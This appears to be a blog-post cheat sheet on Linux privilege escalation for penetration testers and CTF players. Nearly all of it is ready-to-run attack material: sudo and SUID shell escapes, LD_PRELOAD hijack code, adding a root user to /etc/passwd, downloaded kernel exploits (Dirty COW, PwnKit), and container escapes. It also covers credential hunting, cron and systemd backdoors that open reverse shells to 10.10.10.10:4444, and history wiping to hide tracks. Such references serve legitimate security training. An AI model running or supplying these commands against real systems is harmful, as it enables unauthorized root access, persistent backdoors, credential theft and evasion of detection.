# Breaking Root: The Ultimate Linux Priv Esc Handbook

***

<figure><img src="https://cdn-images-1.medium.com/max/840/1*mqLDvRCmOcS5TVLFqFSLrQ.png" alt=""><figcaption></figcaption></figure>

***

#### Overview

Privilege escalation on Linux is both an art and a science.\
&#x20;For red teamers, penetration testers, and CTF players, it’s the **moment of truth** — the final step where a low-privileged foothold morphs into full system compromise.

This post is your definitive breakdown — a **field guide** combining automation, manual tactics, CVEs, and post-exploitation persistence techniques. Every command here has been field-tested in live labs, CTFs, and real-world assessments.

#### Automated Enumeration Tools

Let’s start with the recon phase. Before exploiting, **enumerate everything** — system, users, cron jobs, SUIDs, capabilities, kernel, network, and more.

**LinPEAS — The King of Enumeration**

<figure><img src="https://cdn-images-1.medium.com/max/840/1*R7ig_hzDagcrOIIi5Bw1Sw.png" alt=""><figcaption></figcaption></figure>

```
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh -a              # All checks (deep mode)
./linpeas.sh -s              # Superfast stealth mode
./linpeas.sh -P password123  # With sudo password
```

LinPEAS dives through configs, sudo rules, cron jobs, kernel exploits, and more. Always run it first.

**Linux Exploit Suggester**

Find potential kernel exploits based on your version.

```
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh
```

Version 2 adds even more CVE mappings:

```
wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
chmod +x linux-exploit-suggester-2.pl
./linux-exploit-suggester-2.pl
./linux-exploit-suggester-2.pl -k 3.9  # Specific kernel
```

**Linux Smart Enumeration (LSE)**

```
wget https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh
chmod +x lse.sh
./lse.sh -l1
./lse.sh -l2
```

**pspy — Process Snooping without Root**

Detects running cron jobs and background tasks.

```
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
chmod +x pspy64
./pspy64 -pf -i 1000
```

**GTFONow — Automated Exploitation**

<figure><img src="https://cdn-images-1.medium.com/max/840/1*1JvYg2mpMNBgXN-GDBioEA.png" alt=""><figcaption></figcaption></figure>

Automates GTFOBins attacks (SUIDs, capabilities, sudo).

```
wget https://raw.githubusercontent.com/Frissi0n/GTFONow/main/gtfonow.py
python3 gtfonow.py
```

***

#### Manual Enumeration

Once you’ve automated, dive deep manually.

**System Information**

```
uname -a
cat /etc/issue
cat /etc/*-release
hostname
dmesg | grep Linux
lsb_release -a
```

**User Enumeration**

```
id
whoami
cat /etc/passwd
cat /etc/shadow
cat /etc/group
```

**Process and Network Recon**

```
ps aux
ss -tulpn
ip a
iptables -L
```

**Environment and History**

```
env
echo $PATH
history
cat ~/.bash_history
```

#### Sudo Exploitation

**Check Privileges**

```
sudo -l
sudo -V
```

**Common Exploits via GTFOBins**

```
sudo vim -c ':!/bin/sh'
sudo less /etc/hosts  # then !bash
sudo find . -exec /bin/sh \; -quit
sudo python -c 'import os; os.system("/bin/sh")'
```

**LD\_PRELOAD Exploit**

```
cat > shell.c << EOF
#include <stdio.h>
#include <stdlib.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash -p");
}
EOF
```

```
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
sudo LD_PRELOAD=./shell.so find
```

**LD\_LIBRARY\_PATH Hijack**

```
cat > library_path.c << EOF
#include <stdlib.h>
void hijack() __attribute__((constructor));
void hijack() {
    setresuid(0,0,0);
    system("/bin/bash -p");
}
EOF
gcc -shared -fPIC -o /tmp/libcrypt.so.1 library_path.c
sudo LD_LIBRARY_PATH=/tmp command
```

**CVE-2019–14287 — Sudo Bypass**

```
sudo -u#-1 /bin/bash
```

***

#### SUID / SGID Exploitation

<figure><img src="https://cdn-images-1.medium.com/max/840/1*hmqZVI5pHLQCgGp8_mcPgg.png" alt=""><figcaption></figcaption></figure>

**Find Binaries**

```
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
```

**Exploit Examples**

```
/bin/bash -p
find . -exec /bin/sh -p \; -quit
vim -c ':py3 import os; os.execl("/bin/sh","sh","-pc","reset; exec sh -p")'
python -c 'import os; os.execl("/bin/sh","sh","-p")'
```

Create your own SUID binary:

```
cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash
/tmp/rootbash -p
```

***

#### Capabilities

Find all:

```
getcap -r / 2>/dev/null
```

Exploit `cap_setuid`:

```
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
```

Exploit `cap_dac_override`:

```
python -c 'open("/etc/passwd","a").write("hacker::0:0::/root:/bin/bash\n")'
```

***

#### Cron Jobs & Timers

<figure><img src="https://cdn-images-1.medium.com/max/840/1*UKzpcS78uR121bsm4vHxNg.png" alt=""><figcaption></figcaption></figure>

**Enumerate**

```
cat /etc/crontab
ls -la /etc/cron.*
systemctl list-timers --all
```

If writable:

```
echo 'cp /bin/bash /tmp/bash && chmod +s /tmp/bash' >> /path/to/script.sh
```

Wildcard Injection:

```
touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=sh shell.sh'
```

***

#### NFS no\_root\_squash Exploit

```
showmount -e [target_ip]
mount -t nfs [target]:/share /tmp/nfs
cp /bin/bash /tmp/nfs/bash
chmod +s /tmp/nfs/bash
```

***

#### Writable /etc/passwd

**Add Root User**

```
openssl passwd -1 -salt ignite password123
echo 'root2:$1$ignite$hash:0:0:root:/root:/bin/bash' >> /etc/passwd
su root2
```

***

#### Kernel Exploits

<figure><img src="https://cdn-images-1.medium.com/max/840/1*ma7TE-XzU7xPqZKeV7m7iQ.png" alt=""><figcaption></figcaption></figure>

**Dirty COW (CVE-2016–5195)**

```
wget https://github.com/firefart/dirtycow/raw/master/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
./dirty password123
```

**PwnKit (CVE-2021–4034)**

```
wget https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.c
make
./cve-2021-4034
```

***

#### Docker & LXD Escalation

<figure><img src="https://cdn-images-1.medium.com/max/840/1*TOCo2jKDaXcYBNtaCG3wXQ.png" alt=""><figcaption></figcaption></figure>

If user in docker group:

```
docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash
```

If LXD:

```
lxc init ubuntu:18.04 privesc
lxc config device add privesc disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/bash
```

***

#### Persistence Techniques

**SSH Key**

```
ssh-keygen -t rsa -b 4096
echo "ssh-rsa AAA..." >> ~/.ssh/authorized_keys
```

**Cron Backdoor**

```
echo "* * * * * bash -i >& /dev/tcp/10.10.10.10/4444 0>&1" | crontab -
```

**Systemd Service**

```
cat > /etc/systemd/system/backdoor.service << EOF
[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'
EOF
systemctl enable backdoor.service
systemctl start backdoor.service
```

***

#### Password & Credential Discovery

```
grep -r "password" /home/ 2>/dev/null
find /var/www -name "*.php" | xargs grep -i pass
find / -name ".env" 2>/dev/null
find / -name "id_rsa" 2>/dev/null
```

***

#### Clean-Up & Stealth

```
history -c && rm ~/.bash_history
unset HISTFILE
```

Use LinPEAS `-s` mode for stealth and clean any binaries or exploits post-use.

***

#### Resources

* [GTFOBins](https://gtfobins.github.io)
* [HackTricks Linux Privilege Escalation](https://book.hacktricks.xyz/linux-hardening/privilege-escalation)
* [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)
* [Internal All The Things](https://swisskyrepo.github.io/InternalAllTheThings/)
* [HackingArticles — PrivEsc Cheat Sheet](https://www.hackingarticles.in/privilege-escalation-cheatsheet-vulnhub/)

***

#### Final Words

Privilege escalation isn’t about memorizing commands — it’s about understanding **how misconfigurations become weapons**.\
Each vector — from a simple SUID bit to a misconfigured NFS share — represents a story of trust broken and control seized.